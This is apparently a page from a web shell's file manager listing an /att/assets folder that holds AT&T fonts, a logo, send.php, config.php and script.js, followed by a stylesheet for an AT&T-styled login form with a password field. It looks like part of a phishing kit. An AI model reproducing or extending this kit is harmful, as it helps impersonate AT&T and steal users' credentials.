at path:
ROOT
/
att
/
assets
/
style.css
run:
R
W
Run
ATTAleckSans_W_Md.woff
23.36 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
ATTAleckSans_W_Rg.woff
22.32 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
conf.php
131 By
2025-09-13 22:59:40
R
W
Run
Delete
Rename
config.php
1.43 KB
2025-09-13 23:00:22
R
W
Run
Delete
Rename
errornew.svg
587 By
2021-11-03 18:23:32
R
W
Run
Delete
Rename
logo.svg
8.17 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
script.js
712 By
2025-09-13 23:19:10
R
W
Run
Delete
Rename
send.php
131 By
2026-01-03 04:34:22
R
W
Run
Delete
Rename
style.css
5.6 KB
2025-09-07 19:52:06
R
W
Run
Delete
Rename
error_log
up
📄
style.css
Save
body {width:100%;margin:0;padding:0;} .br {border:1px solid #eee;} .Md {font-family: ATTAleckSans-Medium;} .Rg {font-family: ATTAleckSans-Regular;} .err {display:none;} @font-face { font-family: ATTAleckSans-Medium; src: url(ATTAleckSans_W_Md.woff); } @font-face { font-family: ATTAleckSans-Regular; src: url(ATTAleckSans_W_Rg.woff); } .container { width:100%; margin:0 auto; padding:0; background:#f7f7f7; float:left; } .screen { max-width:400px; margin:60px auto 0; padding:45px; border:none; border-radius:2px; background:#fff; box-sizing:border-box; } .screen ul { width:100%; margin:0 auto; padding:0; list-style:none; } .screen ul li { width:100%; margin:0 auto; padding:0; display:block; } .screen ul li .err { width: 310px; border-radius: 3px; margin-bottom:10px; border: 1px solid rgba(215,56,56,.1); background-color: rgba(215,56,56,.03); padding: 11px 15px 10px 16px; display: flex; align-items: flex-start; font-family: ATTAleckSans-Regular; margin-top: 12px; box-sizing: border-box; } .screen ul li .err span, .screen ul li .err i {display:inline-block;} .screen ul li .err i { box-sizing: border-box; position:relative; top:0; margin:0; padding:0; width: 50px; height: 18px; display: inline-block; vertical-align: text-top; background-color: transparent; background-position-y: center; background-position-x: 0; background-repeat: no-repeat; background-size: contain; background-image: url(errornew.svg); } .screen ul li .err span { padding-left: 12px; box-sizing: border-box; font-family: ATTAleckSans-Regular; font-size: 14px; font-weight: 400; vertical-align: text-top; line-height: 1.2; color: #212529; text-align: left; margin:0 auto; } .screen ul li .err span legend { text-transform: uppercase; padding-top: 10px; font-family: ATTAleckSans-Medium; font-size: 12px; font-weight: 500; line-height: 1.83; letter-spacing: .9px; color: #72727e; } .screen ul li img { width:60px; margin:0 auto; padding:0; } .screen ul li p { color:#1d2329; margin:0 auto; padding:0; } .screen ul li label { width:100%; margin:0 auto; padding:0 0 7px 0; color:#1d2329; font-weight:500; font-size:14px; display:block; font-family: ATTAleckSans-Medium; } .screen ul li .inp { width:100%; margin:0 auto; padding:13px; box-sizing:border-box; display:flex; color:#333; font-size:16px; background:#fff; font-weight:400; border:1px solid #797e85; border-radius:2px; font-family: ATTAleckSans-Regular; } .screen ul li input[type=password] { -webkit-text-security: disc !important; } .screen ul li .inp:focus {border:1px solid #0057b8;} .screen ul li a { width:100%; margin:0 auto; padding:0; color:#0057b8; font-weight:400; font-size:14px; display:block; text-decoration:none; font-family: ATTAleckSans-Medium; } .contain { display: block; position: relative; padding-left: 35px; margin-bottom: 12px; cursor: pointer; font-size: 22px; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; font-family: ATTAleckSans-Regular !important; } .contain input { position: absolute; opacity: 0; cursor: pointer; height: 0; width: 0; } /* Create a custom checkbox */ .checkmark { position: absolute; top: -2px; left: 0; height: 22px; width: 23px; background-color: #fff; border:1px solid #eee; border-radius:2px; } /* On mouse-over, add a grey background color */ .contain:hover input ~ .checkmark { background-color: #fff; } /* When the checkbox is checked, add a blue background */ .contain input:checked ~ .checkmark { background-color: #0057b8; } /* Create the checkmark/indicator (hidden when not checked) */ .checkmark:after { content: ""; position: absolute; display: none; } /* Show the checkmark when checked */ .contain input:checked ~ .checkmark:after { display: block; } /* Style the checkmark/indicator */ .contain .checkmark:after { left: 8px; top: 5px; width: 4px; height: 7px; border: solid white; border-width: 0 3px 3px 0; -webkit-transform: rotate(45deg); -ms-transform: rotate(45deg); transform: rotate(45deg); font-family: ATTAleckSans-Regular; } .screen ul li .btn { width:100%; height:48px; margin:27px auto 20px; padding:; font-size:15px; font-weight:500; color:#fff; border-radius: 3px; border: 1px solid #0057b8; background-color: #0057b8; text-align:center; display:block; cursor:pointer; font-family: ATTAleckSans-Medium; } footer { width:100%; margin:20px auto 0; padding:0; display:block; text-align:center; } footer ul { width:100%; margin:0 auto; padding:0; display:block; border:none; list-style:none; } footer ul li { margin:0 auto; display:inline-block; box-sizing:border-box; } footer ul li a { transition: color .3s linear; font-family: ATTAleckSans-Medium; font-size: 12px; line-height: 2; margin:0 auto; padding:0 7px; letter-spacing: normal; text-align: center; color: #0057b8; text-decoration:none; } footer p { font-family: ATTAleckSans-Regular; font-size: 12px; font-weight: 500; font-style: normal; font-stretch: normal; line-height: 2; letter-spacing: normal; padding:0; margin:0 auto; } @media(max-width:400px){ .screen { margin:0 auto !important; padding:35px; } footer ul li { width:100%; display:block; } }